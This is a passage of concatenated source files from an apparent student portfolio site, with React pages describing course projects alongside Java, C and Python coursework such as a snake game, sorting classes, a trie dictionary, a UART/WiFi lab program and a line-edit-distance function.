* The method calls getReverseCompSeq() and saves the result in a
* temporary array and then copies the array back into the char array seqarr
*/
public void reverseComplement() {
char[] temp = getReverseCompSeq();
seqarr = temp;
}
}
<file_sep>/src/ClassComponents/ComS227/A4/SnakeHead.java
package hw4;
import java.awt.Color;
import main.Config;
import graph.Cell;
import state.Snake;
import state.SnakeSegment;
import state.State;
/**
* An impassable state that follows the mouse's position or moves randomly if it can't
* move towards the mouse. If it still cannot move, the game ends. If the snake can move,
* it replaces its current cell with a SnakeSegment before moving. If it finds Food,
* it increments its length. Uses the default snake variables. An "S" in the map file.
* @author <NAME>
*
*/
public class SnakeHead implements State, Snake{
/**
* holds the value of the length of the Snake
*/
private int length;
/**
* holds the value of the timer
*/
private int timer;
/**
* Makes a new SnakeHead that initializes the timer to 0 and the length to 4
*/
public SnakeHead(){
timer = 0;
length = 4;
}
/**
* Gets the length of the snake
* @return the length
*/
public int getLength(){
return length;
}
/**
* Updates the cell based off of the state. This method can update the cell's state,
* or potentially another cell's state depending on the implementation. If the timer
* is greater than or equal to MAX_SNAKE_TIMER then the snake will try to find a random
* cell closer to the mouse, using the appropriate method of the Cell class.
* If no such cell exists, it will then try to find any random open cell. If no
* such second cell exists, then the player loses the game. Also if the next cell is
* food then the length is incremented
* @param cell - The cell that this state belongs to
*/
public void handle(Cell cell){
timer++;
if(timer >= Config.MAX_SNAKE_TIMER){
timer = 0;
Cell nextCell = cell.getRandomCloser();
if(nextCell == null){
nextCell = cell.getRandomOpen();
}
if(nextCell != null && nextCell.getState() != null && (nextCell.getState().toChar() == 'F' || nextCell.getState().toChar() == 'D')){
length++;
}
if(nextCell != null){
cell.moveState(nextCell);
cell.setState(new SnakeSegment(this));
}
if(nextCell == null){
Config.endGame(length);
}
}
}
/**
* Get the current color of the state (can be used for drawing).
* @return the color of the state
*/
public java.awt.Color getColor(){
return new Color(0,255,255);
}
/**
* Get whether or not the cell is passable. Affects whether or not a state can move
* through another state via random movement or moving closer to the mouse.
* @return true if the state is passable
*/
public boolean isPassable(){
return false;
}
/**
* Get the character representation for this State. Used for loading map text files.
* @return character representation for this State
*/
public char toChar(){
return 'S';
}
}
<file_sep>/src/Components/CPRE281/CPRE281.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ThreebitPAregister from './3bitPAregister.png';
import SevenSegDecoder from './7segDecoder.png';
import EightThreeEncoder from './8-3encoder.png';
import comparator from './comparator.png';
import counter from './counter.png';
import decoder from './decoder.png';
import FinalCircuit from './FinalCircuit.png';
import registerFile from './registerFile.png';
const Title = Typography.Title;
export default class CPRE281 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Digital Logic - CPRE 281</Title>
<Title level={2}>Digital Combination Lock Project</Title>
<Title level={4}>Technology: VHDL, Quartus Prime, FPGA board</Title>
In this class, we used a field-programmable gate array (FPGA) board to implement the basic
logic components that comprise computer hardware. We used a program called Quartus Prime
to create block diagrams of the components and send them to the board.
<br></br><br></br>
For the final project, I created a digital combination lock using the switches, the
seven-segment displays, and the LEDs on the board. The user could set a combination,
enter a combination, and reset a combination.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={24}>
<Title level={4}>Final Circuit Diagram</Title>
<img width='100%' src={FinalCircuit} alt=''/>
<Title level={4}>Register File</Title>
<img width='100%' src={registerFile} alt=''/>
<Title level={4}>Decoder</Title>
<img width='100%' src={decoder} alt=''/>
<Title level={4}>Counter</Title>
<img width='100%' src={counter} alt=''/>
<Title level={4}>Comparator</Title>
<img width='100%' src={comparator} alt=''/>
<Title level={4}>8-3 Encoder</Title>
<img width='100%' src={EightThreeEncoder} alt=''/>
<Title level={4}>Seven Segment Decoder</Title>
<img width='50%' src={SevenSegDecoder} alt=''/>
<Title level={4}>Three Bit Parallel Access Register</Title>
<img width='100%' src={ThreebitPAregister} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project2/InsertionSorter.java
package edu.iastate.cs228.hw2;
import java.io.FileNotFoundException;
import java.util.InputMismatchException;
/**
*
* @author <NAME>
*
*/
/**
*
* This class implements insertion sort.
*
*/
public class InsertionSorter extends AbstractSorter {
// Other private instance variables if you need ...
/**
* The two constructors below invoke their corresponding superclass
* constructors. They also set the instance variables algorithm and
* outputFileName in the superclass.
*/
/**
* Constructor takes an array of points.
*
* @param pts
*/
public InsertionSorter(Point[] pts) {
super(pts);
outputFileName = "insert.txt";
algorithm = "insertion sorter ";
}
/**
* Constructor reads points from a file.
*
* @param inputFileName
* name of the input file
* @throws FileNotFoundException
* @throws InputMismatchException
*/
public InsertionSorter(String inputFileName) throws InputMismatchException, FileNotFoundException {
super(inputFileName);
outputFileName = "insert.txt";
algorithm = "insertion sorter ";
}
/**
* Perform insertion sort on the array points[] of the parent class
* AbstractSorter.
*
* @param order
* 1 by x-coordinate 2 by polar angle
*/
@Override
public void sort(int order) {
if (order < 1 || order > 2) {
throw new IllegalArgumentException("Invalid input");
}
else{
if(order == 1){
sortByAngle = false;
}
else{
sortByAngle = true;
}
setComparator();
long startTime = System.nanoTime();
int j;
for(int i = 1; i < points.length; i++){
Point t = points[i];
for(j = i - 1; j >= 0 && pointComparator.compare(t, points[j]) == -1; j--){
points[j + 1] = points[j];
}
points[j + 1] = t;
}
long endTime = System.nanoTime();
sortingTime = endTime - startTime;
try {
writePointsToFile();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
}
<file_sep>/src/ClassComponents/CPRE381/ProjectA/ProjectA.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Diagram from './Diagram.png';
import instructions from './Project-A-Instruction.pdf';
import ProjectFiles from './projectA.zip';
const Title = Typography.Title;
export default class ProjectA extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Single-Cycle MIPS Processor - Project A</Title>
<Title level={4}>Technology: VHDL, Quartus Prime, Assembly</Title>
For this project, my teammate and I created a MIPS processor that executes 32-bit
instructions. Single-cycle means that the processor completes each instruction in a single
clock cycle. We connected previously created logic components together in Quartus Prime,
converted the design to a VHDL file, and ran it in a separate program.
<br></br>
<a href={instructions} download="Project-A-Instruction.pdf">Download project description</a>
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>High-Level Block Diagram</Title>
<img width='100%' src={Diagram} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project4/Dictionary.java
package edu.iastate.cs228.hw4;
import java.util.Arrays;
import java.util.Scanner;
import java.io.FileNotFoundException;
import java.io.File;
/**
* @author XXXXX
*
* An application class
*/
public class Dictionary {
public static void main(String[] args) throws FileNotFoundException {
File infile = new File(args[0]);
Scanner inLine = new Scanner(infile);
EntryTree<Character, String> tree = new EntryTree<Character, String>();
while(inLine.hasNextLine()){
String line = inLine.nextLine();
Scanner inWord = new Scanner(line);
boolean add = false;
boolean remove = false;
boolean search = false;
boolean prefix = false;
while(inWord.hasNext()){
String word = inWord.next();
if(word.equals("add")) add = true;
if(word.equals("remove")) remove = true;
if(word.equals("search")) search = true;
if(word.equals("prefix")) prefix = true;
if(word.equals("showTree")){
System.out.println("Command: showTree");
System.out.println("Result from a showTree: ");
tree.showTree();
System.out.println("\n");
}
if(add){
String keys = inWord.next();
String value = inWord.next();
System.out.println("Command: add " + keys + " " + value);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
boolean result = tree.add(keyarr, value);
System.out.println("Result from an add: " + result + "\n");
}
if(remove){
String keys = inWord.next();
System.out.println("Command: remove " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
String result = tree.remove(keyarr);
System.out.println("Result from a remove: " + result + "\n");
}
if(search){
String keys = inWord.next();
System.out.println("Command: search " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
String result = tree.search(keyarr);
System.out.println("Result from a search: " + result + "\n");
}
if(prefix){
String keys = inWord.next();
System.out.println("Command: prefix " + keys);
Character[] keyarr = new Character[keys.length()];
for(int i = 0; i < keys.length(); i++){
keyarr[i] = keys.charAt(i);
}
Character[] result = tree.prefix(keyarr);
String s = "";
for(int i = 0; i < result.length; i++){
s = s + result[i];
}
System.out.println("Result from a prefix: " + s + "\n");
}
}
inWord.close();
}
inLine.close();
}
}<file_sep>/src/ClassComponents/CPRE288/Lab5/lab5.c
/**
*CPRE 288 Lab 5
*
* @author <NAME>, <NAME>, <NAME>
* @date 08/07/2016
*/
#include <stdlib.h>
#include <stdbool.h>
#include "button.h"
#include "lcd.h"
#include "Timer.h"
#include "uart.h"
#include "wifi.h"
void initPortB (void){
SYSCTL_RCGCGPIO_R = 0x02;
SYSCTL_RCGCUART_R = 0x02;
GPIO_PORTB_AFSEL_R = 0x03;
GPIO_PORTB_PCTL_R = 0x00000011;
GPIO_PORTB_DEN_R = 0x03;
}
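/*
 * Note on initPortB (assuming the TM4C123-style registers used above): the writes
 * appear to enable the clocks for GPIO Port B and UART1, select the alternate
 * (UART) function on pins PB0/PB1 via AFSEL and PCTL, and digitally enable those
 * pins so UART1 can carry the serial link to the WiFi module.
 */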
int main (void){
char DataIn[20];
char PSK[] = "Password33";
int i = 0;
initPortB();
//uart_init();
lcd_init();
button_init();
WiFi_start(PSK);
	char lastButton = 0;  // initialized so the first comparison with 'button' below is well-defined
char button;
while (1){
if (!(UART1_FR_R & 0x10)){ //If receive FIFO not empty receive data
DataIn[i] = uart_receive();
i++;
lcd_printf("%c \n Index:%d", DataIn[i-1], i);
}
if (i == 20){
lcd_printf("%s", DataIn);
i = 0;
}
if (DataIn[i-1] == '\r'){ //Checks to see if the latest key returned was the return key.
DataIn[i-1] = '\0';
lcd_printf("%s", DataIn); //Prints data out to LCD screen
uart_sendChar('\n'); //Sends string of characters back to putty after setting new line and carriage return.
uart_sendStr(DataIn);
i = 0; //Resets character count
}
button = button_getButton();
if(lastButton != button){
if(button == 0x06){
uart_sendStr("Yes");
timer_waitMillis(200);
}
else if(button == 0x05){
uart_sendStr("No");
timer_waitMillis(200);
}
else if(button == 0x04){
uart_sendStr("Blue, no green, Ahhhh!!!!");
timer_waitMillis(200);
}
else if(button == 0x03){
uart_sendStr("Hello");
timer_waitMillis(200);
}
else if(button == 0x02){
uart_sendStr("Firetruck");
timer_waitMillis(200);
}
else if(button == 0x01){
uart_sendStr("aliens");
timer_waitMillis(200);
}
}
lastButton = button;
}
}
<file_sep>/src/Components/ComS363/ComS363.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import appSS1 from './appSS1.png';
import appSS2 from './appSS2.png';
import appSS3 from './appSS3.png';
import appSS4 from './appSS4.png';
import appSS5 from './appSS5.png';
import appSS6 from './appSS6.png';
import appSS7 from './appSS7.png';
import appSS8 from './appSS8.png';
import appSS9 from './appSS9.png';
import appSS10 from './appSS10.png';
import appSS11 from './appSS11.png';
import appSS12 from './appSS12.png';
import cipherQueries from './cipherQueries.png';
import ProjectFiles from './ComS363project.zip';
import ddlSS1 from './ddlSS1.png';
import ddlSS2 from './ddlSS2.png';
import ERdiagram from './ERdiagram.png';
import insertData from './insertData.png';
import projectDDL from './projectDDL.sql';
import projectInsert from './projectInsert.sql';
import Q1jsp from './Q1.jsp';
import Q1png from './Q1.png';
import Queries from './Queries.cipher';
import querySolutionsPng from './querySolutions.png';
import querySolutionsSql from './querySolutions.sql';
import resultQ1png from './resultQ1.png';
import resultQ1 from './ResultQ1.jsp';
import SQLqueries from './SQLqueries.png';
const Title = Typography.Title;
export default class ComS363 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Database Management Systems - Computer Science 363</Title>
<Title level={3}>Database and Web Application Project</Title>
<Title level={4}>Technology: HTML, Java, MySQL, Neo4j Graph Database, Eclipse, Apache Server</Title>
This project involved designing an entity-relationship (ER) diagram, implementing the diagram
in SQL DDL statements, entering over 250,000 rows of real Twitter data into the database, performing
complicated SQL queries on the data, optimizing these queries, and creating the same queries for a
corresponding Neo4j graph database.
<br></br><br></br>
For the final part of the project, my team (two others) and I used a local Apache server to make a
web application in Eclipse using JSP (Java Server Pages) files that connected to the database. The
app allowed the user to perform the same queries mentioned earlier on the Twitter database.
<br></br>
<a href={ProjectFiles} download="ProjectFile.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>The entity-relationship diagram</Title>
<img width='100%' src={ERdiagram} alt=''/>
<Title level={4}>projectDDL.sql (click on image to download file): This is the SQL file that implements the above design</Title>
<a href={projectDDL} download="projectDDL.sql">
<img width='100%' src={ddlSS1} alt=''/>
<img width='100%' src={ddlSS2} alt=''/>
</a>
<Title level={4}>projectInsert.sql (click on image to download file): This is the SQL file that inserts the data into the database from the specified csv files</Title>
<a href={projectInsert} download="projectInsert.sql">
<img width='100%' src={insertData} alt=''/>
</a>
<Title level={4}>These are the descriptions for the SQL queries that we made on the Tweet database</Title>
<img width='100%' src={SQLqueries} alt=''/>
<Title level={4}>querySolutions.sql (click on image to download file): This file contains the queries that yield the outputs of the descriptions above</Title>
<a href={querySolutionsSql} download="querySolutions.sql">
<img width='100%' src={querySolutionsPng} alt=''/>
</a>
<Title level={4}>
Queries.cipher (click on image to download file): These are the corresponding Neo4j (graph database) cipher queries.
They give the same results as the SQL queries but are written for a graph database
</Title>
<a href={Queries} download="cipherQueries.cypher">
<img width='100%' src={cipherQueries} alt=''/>
</a>
<Title level={4}>The login page for the web app:</Title>
<img width='100%' src={appSS1} alt=''/>
<Title level={4}>After the user logs in, they will be able to run any of the queries on the database:</Title>
<img width='100%' src={appSS2} alt=''/>
<Title level={4}>
Q1.jsp (click on image to download file): HTML description for the
user input of the first query on the web application
</Title>
<a href={Q1jsp} download="Q1.jsp">
<img width='100%' src={Q1png} alt=''/>
<img width='100%' src={appSS3} alt=''/>
</a>
<Title level={4}>
ResultQ1.jsp (click on image to download file): The page that shows the results
of the query after the user enters the information
</Title>
<a href={resultQ1} download="ResultQ1.jsp">
<img width='100%' src={resultQ1png} alt=''/>
</a>
<Title level={4}>Results of Q1</Title>
<img width='100%' src={appSS4} alt=''/>
<Title level={4}>Results of Q3:</Title>
<img width='100%' src={appSS5} alt=''/>
<Title level={4}>Results of Q6:</Title>
<img width='100%' src={appSS6} alt=''/>
<Title level={4}>Results of Q9:</Title>
<img width='100%' src={appSS7} alt=''/>
<Title level={4}>Results of Q10:</Title>
<img width='100%' src={appSS8} alt=''/>
<Title level={4}>Results of Q11:</Title>
<img width='100%' src={appSS9} alt=''/>
<Title level={4}>Results of Q15:</Title>
<img width='100%' src={appSS10} alt=''/>
<Title level={4}>Results of Q18:</Title>
<img width='100%' src={appSS11} alt=''/>
<Title level={4}>Results of Q23:</Title>
<img width='100%' src={appSS12} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/ComS227.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import A1 from './A1/A1.js';
import A2 from './A2/A2.js';
import A3 from './A3/A3.js';
import A4 from './A4/A4.js';
import TallyClass from './TallyClass/TallyClass.js';
import TransClasses from './TransClasses/TransClasses.js';
const { Header, Content, Sider } = Layout;
export default class ComS227 extends React.Component {
state = {
collapsed: false,
currentPage: "A1"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleA1Click = () => {
this.setState({
currentPage: "A1"
});
}
handleA2Click = () => {
this.setState({
currentPage: "A2"
});
}
handleA3Click = () => {
this.setState({
currentPage: "A3"
});
}
handleA4Click = () => {
this.setState({
currentPage: "A4"
});
}
handleTallyClassClick = () => {
this.setState({
currentPage: "TallyClass"
});
}
handleTransClassesClick = () => {
this.setState({
currentPage: "TransClasses"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "A1") {
page = <A1/>
}
else if (this.state.currentPage === "A2") {
page = <A2/>
}
else if (this.state.currentPage === "A3") {
page = <A3/>
}
else if (this.state.currentPage === "A4") {
page = <A4/>
}
else if (this.state.currentPage === "TallyClass") {
page = <TallyClass/>
}
else if (this.state.currentPage === "TransClasses") {
page = <TransClasses/>
}
if (this.props.location.state.path === "Categories/Java") {
pathItem1 = "Categories"
pathItem2 = "Java"
}
else if (this.props.location.state.path === "Years/Freshman") {
pathItem1 = "Years"
pathItem2 = "Freshman"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleA1Click}>
Simple Television Class - Assignment 1
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleA2Click}>
Football Game Class - Assignment 2
</Menu.Item>
<Menu.Item key="3" icon={<MenuOutlined/>} onClick={this.handleA3Click}>
Color Flow Game - Assignment 3
</Menu.Item>
<Menu.Item key="4" icon={<MenuOutlined/>} onClick={this.handleA4Click}>
Snake Game - Assignment 4
</Menu.Item>
<Menu.Item key="5" icon={<MenuOutlined/>} onClick={this.handleTallyClassClick}>
Tally Class - Assignment 1
</Menu.Item>
<Menu.Item key="6" icon={<MenuOutlined/>} onClick={this.handleTransClassesClick}>
Transformation Classes - Assignment 2
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "A1" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Simple Television Class - Assignment 1</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A2" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Football Game Class - Assignment 2</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A3" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Color Flow Game - Assignment 3</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "A4" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Snake Game - Assignment 4</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "TallyClass" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Tally Class - Assignment 1</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "TransClasses" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Object-Oriented Programming - Com S 227</Breadcrumb.Item>
<Breadcrumb.Item>Transformation Classes - Assignment 2</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/AWSAPI/UserController.java
package com.aws.codestar.projecttemplates.controller;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import com.aws.codestar.projecttemplates.dao.UserRepo;
import com.aws.codestar.projecttemplates.model.User;
@RestController
public class UserController {
@Autowired
UserRepo rep;
@RequestMapping(method = RequestMethod.POST, path = "/addUser")
public String saveOwner(User user) {
rep.save(user);
return "New User "+ user.getName() + " Saved";
}
@RequestMapping(method = RequestMethod.GET, path = "/users")
public List<User> getUsers() {
List<User> users = (List<User>) rep.findAll();
System.out.println(users.size());
return users;
}
}
<file_sep>/src/Components/CPRE186/GUItest.java
package gui;
public class GUItest {
public static void main(String[] args){
Buttons b = new Buttons();
b.GUI();
}
}
<file_sep>/src/ClassComponents/CPRE288/Lab5/Lab5.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab5C from './lab5.c';
import lab5PNG from './lab5.png';
import ProjectFiles from './lab5Files.zip';
import WiFiC from './WiFi.c';
import WiFiPNG from './WiFi.png';
const Title = Typography.Title;
export default class Lab5 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Implementing WiFi Connectivity - Lab 5</Title>
<Title level={4}>Technology: C, Embedded Systems</Title>
In this project, my team and I configured the WiFi capability of the robot.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab5.c (click on image to download file)</Title>
<a href={lab5C} download="lab5.c">
<img width='100%' src={lab5PNG} alt=''/>
</a>
<Title level={4}>WiFi.c (click on image to download file)</Title>
<a href={WiFiC} download="WiFi.c">
<img width='100%' src={WiFiPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q4.py
def line_edits(s1, s2):
"""function for generating the descriptions of line edits"""
l1 = s1.splitlines()
l2 = s2.splitlines()
result = editDistance(l1, l2)
result = result[::-1]
return result
def editDistance(l1, l2):
"""Helper function to generate the table for line edits"""
cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]
for row in range(len(l1) + 1):
for col in range(len(l2) + 1):
if row == 0 and col == 0:
cache[row][col] = 0
elif col == 0:
cache[row][col] = row
elif row == 0:
cache[row][col] = col
elif l1[row - 1] == l2[col - 1]:
cache[row][col] = cache[row - 1][col - 1]
else:
a = cache[row - 1][col]
b = cache[row][col - 1]
c = cache[row - 1][col - 1]
cache[row][col] = min(a, b, c) + 1
return findResult(l1, l2, cache)
def findResult(l1, l2, table):
"""Helper function to find the result after the table has been built"""
rowH = len(l1)
colH = len(l2)
resultH = []
while rowH != 0 or colH != 0:
if colH == 0:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif rowH == 0:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif l1[rowH - 1] == l2[colH - 1]:
action = ('T', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
else:
rowH, colH, resultH = otherHelper(table, (l1, l2), rowH, colH, resultH)
return resultH
def otherHelper(table, l, rowH, colH, resultH):
"""helper method to shorten the above function"""
l1 = l[0]
l2 = l[1]
delete = table[rowH - 1][colH]
insert = table[rowH][colH - 1]
sub = table[rowH - 1][colH - 1]
if delete <= insert and delete <= sub:
action = ('D', l1[rowH - 1], "")
resultH.append(action)
rowH = rowH - 1
elif insert < delete and insert <= sub:
action = ('I', "", l2[colH - 1])
resultH.append(action)
colH = colH - 1
elif sub < delete and sub < insert:
action = ('S', l1[rowH - 1], l2[colH - 1])
resultH.append(action)
rowH = rowH - 1
colH = colH - 1
return rowH, colH, resultH
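# Worked example (for illustration): each tuple in the result is (op, old_line, new_line),
# where 'T' keeps a line, 'S' substitutes it, 'D' deletes it and 'I' inserts one.
# For instance, line_edits("Line1\n", "") gives [('D', 'Line1', '')], and the s1/s2
# test below keeps Line1/Line3/Line4, deletes Line2, and inserts Line5.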
s1 = "Line1\nLine2\nLine3\nLine4\n"
s2 = "Line1\nLine3\nLine4\nLine5\n"
s3 = "Line1\nLine2\nLine3\nLine4\n"
s4 = "Line5\nLine4\nLine3\n"
s5 = "Line1\n"
s6 = ""
table = line_edits(s1, s2)
for row in table:
print(row)<file_sep>/src/Components/AlienInvasion/AlienInvasion.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import demo from './aiDemo2.mov';
import alienPNG from './alien.png';
import alienPY from './alien.py';
import alienInvasionPY from './alien_invasion.py';
import ProjectFiles from './alien_invasion.zip';
import alienInvasionSS1 from './alienInvasionSS1.png';
import alienInvasionSS2 from './alienInvasionSS2.png';
import alienInvasionSS3 from './alienInvasionSS3.png';
import bulletPY from './bullet.py';
import bulletPNG from './bullet.png';
import buttonPY from './button.py';
import buttonPNG from './button.png';
import gameStatsPY from './game_stats.py';
import gameStatsPNG from './gameStats.png';
import scoreboardPNG from './scoreboard.png';
import scoreboardPY from './scoreboard.py';
import settingsPNG from './settings.png';
import settingsPY from './settings.py';
import shipPNG from './ship.png';
import shipPY from './ship.py';
const Title = Typography.Title;
export default class AlienInvasion extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Alien Invasion Game</Title>
<Title level={4}>Technology: Python, Pygame, Visual Studio Code</Title>
This game features aliens falling from the top of the screen, a ship that moves
left and right when the keyboard arrows are pressed, and bullets that the ship fires
every time the space bar is pressed. The objective is to shoot down all the aliens
before they reach the bottom of the screen. After the user eliminates the aliens, a new
level starts and the aliens become faster each time. The number of ships the user
has left is indicated in the top left of the screen. I made this game using the Pygame
library, which makes it much easier to manage game objects in Python. This
project is based on a tutorial I followed in "Python Crash Course" by <NAME>.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={3}>Demo</Title>
<video controls width='100%'>
<source src={demo}/>
</video>
<Title level={4}>alien_invasion.py: (The main class that is run)</Title>
<a href={alienInvasionPY} download="alien_invasion.py">
<img width='100%' src={alienInvasionSS1} alt=''/>
<img width='100%' src={alienInvasionSS2} alt=''/>
<img width='100%' src={alienInvasionSS3} alt=''/>
</a>
<Title level={4}>ship.py</Title>
<a href={shipPY} download="ship.py">
<img width='100%' src={shipPNG} alt=''/>
</a>
<Title level={4}>alien.py</Title>
<a href={alienPY} download="alien.py">
<img width='100%' src={alienPNG} alt=''/>
</a>
<Title level={4}>bullet.py</Title>
<a href={bulletPY} download="bullet.py">
<img width='100%' src={bulletPNG} alt=''/>
</a>
<Title level={4}>settings.py</Title>
<a href={settingsPY} download="settings.py">
<img width='100%' src={settingsPNG} alt=''/>
</a>
<Title level={4}>game_stats.py</Title>
<a href={gameStatsPY} download="game_stats.py">
<img width='100%' src={gameStatsPNG} alt=''/>
</a>
<Title level={4}>scoreboard.py</Title>
<a href={scoreboardPY} download="scoreboard.py">
<img width='100%' src={scoreboardPNG} alt=''/>
</a>
<Title level={4}>button.py</Title>
<a href={buttonPY} download="button.py">
<img width='100%' src={buttonPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project2/AbstractSorter.java
package edu.iastate.cs228.hw2;
/**
*
* @author <NAME>
*
*/
import java.util.Comparator;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.PrintWriter;
import java.lang.IllegalArgumentException;
import java.util.InputMismatchException;
import java.util.Scanner;
/**
*
* This abstract class is extended by SelectionSort, InsertionSort, MergeSort,
* and QuickSort. It stores the input (later on the sorted) sequence and records
* the employed sorting algorithm, the comparison method, and the time spent on
* sorting.
*
*/
public abstract class AbstractSorter {
protected Point[] points; // Array of points operated on by a sorting
// algorithm.
// The number of points is given by
// points.length.
protected String algorithm = null; // "selection sort", "insertion sort",
// "merge sort", or "quick sort".
// Initialized by a subclass
// constructor.
protected boolean sortByAngle; // true if last sort was done by polar angle
// and false
// if by x-coordinate
protected String outputFileName; // "select.txt", "insert.txt", "merge.txt",
// or "quick.txt"
protected long sortingTime; // execution time in nanoseconds.
protected Comparator<Point> pointComparator; // comparator which compares
// polar angle if
// sortByAngle == true and
// x-coordinate if
// sortByAngle == false
public Point lowestPoint; // lowest point in the array, or in case of a
// tie, the
// leftmost of the lowest points. This point is
// used
// as the reference point for polar angle based
// comparison.
// Add other protected or private instance variables you may need.
protected AbstractSorter() {
// No implementation needed. Provides a default super constructor to
// subclasses.
// Removable after implementing SelectionSorter, InsertionSorter,
// MergeSorter, and QuickSorter.
}
/**
* This constructor accepts an array of points as input. Copy the points
* into the array points[]. Sets the instance variable lowestPoint.
*
* @param pts
* input array of points
